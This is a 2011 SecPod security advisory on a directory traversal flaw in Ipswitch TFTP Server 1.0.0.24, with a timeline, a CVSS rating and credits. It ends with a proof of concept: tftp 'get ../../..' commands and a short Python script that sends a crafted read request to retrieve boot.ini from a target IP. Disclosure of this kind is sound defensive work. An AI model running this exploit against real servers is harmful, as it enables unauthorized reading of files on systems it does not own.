############################################################################## # Title : Ipswitch TFTP Server Directory Traversal Vulnerability # Author : Prabhu S Angadi from SecPod Technologies (www.secpod.com) # Vendor : http://www.whatsupgold.com/index.aspx # Advisory : http://secpod.org/blog/?p=424 # http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt # http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py # Version : Ipswitch TFTP Server 1.0.0.24 # Date : 02/12/2011 ############################################################################## SecPod ID: 1028 13/09/2011 Issue Discovered 04/10/2011 Vendor Notified No Response from Vendor 02/12/2011 Advisory Released Class: Information Disclosure Severity: Medium Overview: --------- Ipswitch TFTP Server 1.0.0.24 is prone to a directory traversal vulnerability. Technical Description: ---------------------- The vulnerability is caused due to improper validation to Read Request containing '../' sequences, which allows attackers to read arbitrary files. Impact: -------- Successful exploitation could allow an attacker to obtain sensitive information. Affected Software: ------------------ Ipswitch TFTP Server 1.0.0.24 Tested on: ----------- Ipswitch TFTP Server 1.0.0.24 on Windows XP SP3 & Windows 7. References: ----------- http://www.ipswitch.com/ http://secpod.org/blog/?p=424 http://www.whatsupgold.com/index.aspx http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py Download Link: -------------- http://www.whatsupgold.com/free-software/network-tools/tftp-server.aspx Proof of Concept: ---------------- tftp> get ../../../../../../../../../../../boot.ini tftp> get ../../../../../../../../../../../windows/win.ini Solution: ---------- Not available Risk Factor: ------------- CVSS Score Report: ACCESS_VECTOR = NETWORK ACCESS_COMPLEXITY = LOW AUTHENTICATION = NOT_REQUIRED CONFIDENTIALITY_IMPACT = PARTIAL INTEGRITY_IMPACT = NONE AVAILABILITY_IMPACT = NONE EXPLOITABILITY = PROOF_OF_CONCEPT REMEDIATION_LEVEL = UNAVAILABLE REPORT_CONFIDENCE = CONFIRMED CVSS Base Score = 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N) CVSS Temporal Score = 4.5 Risk factor = Medium Credits: -------- Prabhu S Angadi of SecPod Technologies has been credited with the discovery of this vulnerability. POC : ====== import sys, socket def sendPacket(HOST, PORT, data): ''' Sends UDP Data to a Particular Host on a Specified Port with a Given Data and Return the Response ''' udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udp_sock.sendto(data, (HOST, PORT)) data = udp_sock.recv(1024) udp_sock.close() return data if __name__ == "__main__": if len(sys.argv) < 2: print '\tUsage: python exploit.py target_ip' print '\tExample : python exploit.py 127.0.0.1' print '\tExiting...' sys.exit(0) HOST = sys.argv[1] ## The Server IP PORT = 69 ## Default TFTP port data = "\x00\x01" ## TFTP Read Request data += "../" * 10 + "boot.ini" + "\x00" ## Read boot.ini file using directory traversal data += "netascii\x00" ## TFTP Type ## netascii rec_data = sendPacket(HOST, PORT, data) print "Data Found on the target : %s " %(HOST) print rec_data.strip()